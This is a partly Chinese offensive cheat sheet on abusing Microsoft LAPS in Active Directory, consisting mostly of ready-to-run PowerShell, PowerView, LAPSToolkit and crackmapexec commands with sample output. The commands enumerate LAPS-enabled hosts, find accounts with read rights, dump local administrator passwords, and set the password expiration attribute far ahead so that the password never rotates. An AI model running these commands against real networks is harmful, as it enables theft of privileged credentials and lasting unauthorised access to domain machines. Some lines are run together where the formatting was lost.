regquery"HKLM\Software\Policies\Microsoft Services\AdmPwd"/vAdmPwdEnableddir"C:\Program Files\LAPS\CSE"# Check if that folder exists and contains AdmPwd.dll# Find GPOs that have "LAPS" or some other descriptive term in the nameGet-DomainGPO|?{ $_.DisplayName-like"*laps*"}|select DisplayName, Name, GPCFileSysPath |fl# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)Get-DomainObject-SearchBase"LDAP://DC=sub,DC=domain,DC=local"|?{ $_."ms-mcs-admpwdexpirationtime"-ne $null }|select DnsHostname
Get-Command*AdmPwd*CommandType Name Version Source----------------------------Cmdlet Find-AdmPwdExtendedRights5.0.0.0 AdmPwd.PSCmdlet Get-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Reset-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdAuditing5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdComputerSelfPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdReadPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdResetPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Update-AdmPwdADSchema5.0.0.0 AdmPwd.PS# List who can read LAPS password of the given OUFind-AdmPwdExtendedRights-Identity Workstations | fl# Read the passwordGet-AdmPwdPassword-ComputerName wkstn-2| fl
PowerView 也可以用来找出谁可以读取密码并读取它:
# Find the principals that have ReadPropery on ms-Mcs-AdmPwdGet-AdmPwdPassword-ComputerName wkstn-2| fl# Read the passwordGet-DomainObject-Identity wkstn-2-Properties ms-Mcs-AdmPwd
LAPSToolkit
LAPSToolkit 有助于枚举具有多个功能的 LAPS。
其中一个功能是解析具有 LAPS 启用的所有计算机的 ExtendedRights。这将显示专门被授予读取 LAPS 密码权限的 组,通常是受保护组中的用户。
一个已将计算机加入域的 帐户 将在该主机上获得 All Extended Rights,这个权限赋予了该 帐户 读取密码的能力。枚举可能显示一个用户帐户可以在主机上读取 LAPS 密码。这可以帮助我们 针对可以读取 LAPS 密码的特定 AD 用户。
# Get groups that can read passwordsFind-LAPSDelegatedGroupsOrgUnit Delegated Groups-----------------------OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain AdminsOU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin# Checks the rights on each computer with LAPS enabled for any groups# with read access and users with "All Extended Rights"Find-AdmPwdExtendedRightsComputerName Identity Reason--------------------------MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins DelegatedMSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated# Get computers with LAPS enabled, expirations time and the password (if you have access)Get-LAPSComputersComputerName Password Expiration------------------------------DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf%12/10/202213:24:41
使用Crackmapexec转储LAPS密码
如果没有访问powershell的权限,您可以通过LDAP远程滥用此特权。
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
LAPS Persistence
Expiration Date
一旦获得管理员权限,可以通过将到期日期设置为未来来获得密码并阻止计算机更新密码。
# Get expiration timeGet-DomainObject-Identity computer-21-Properties ms-mcs-admpwdexpirationtime# Change expiration time## It's needed SYSTEM on the computerSet-DomainObject-Identity wkstn-2-Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
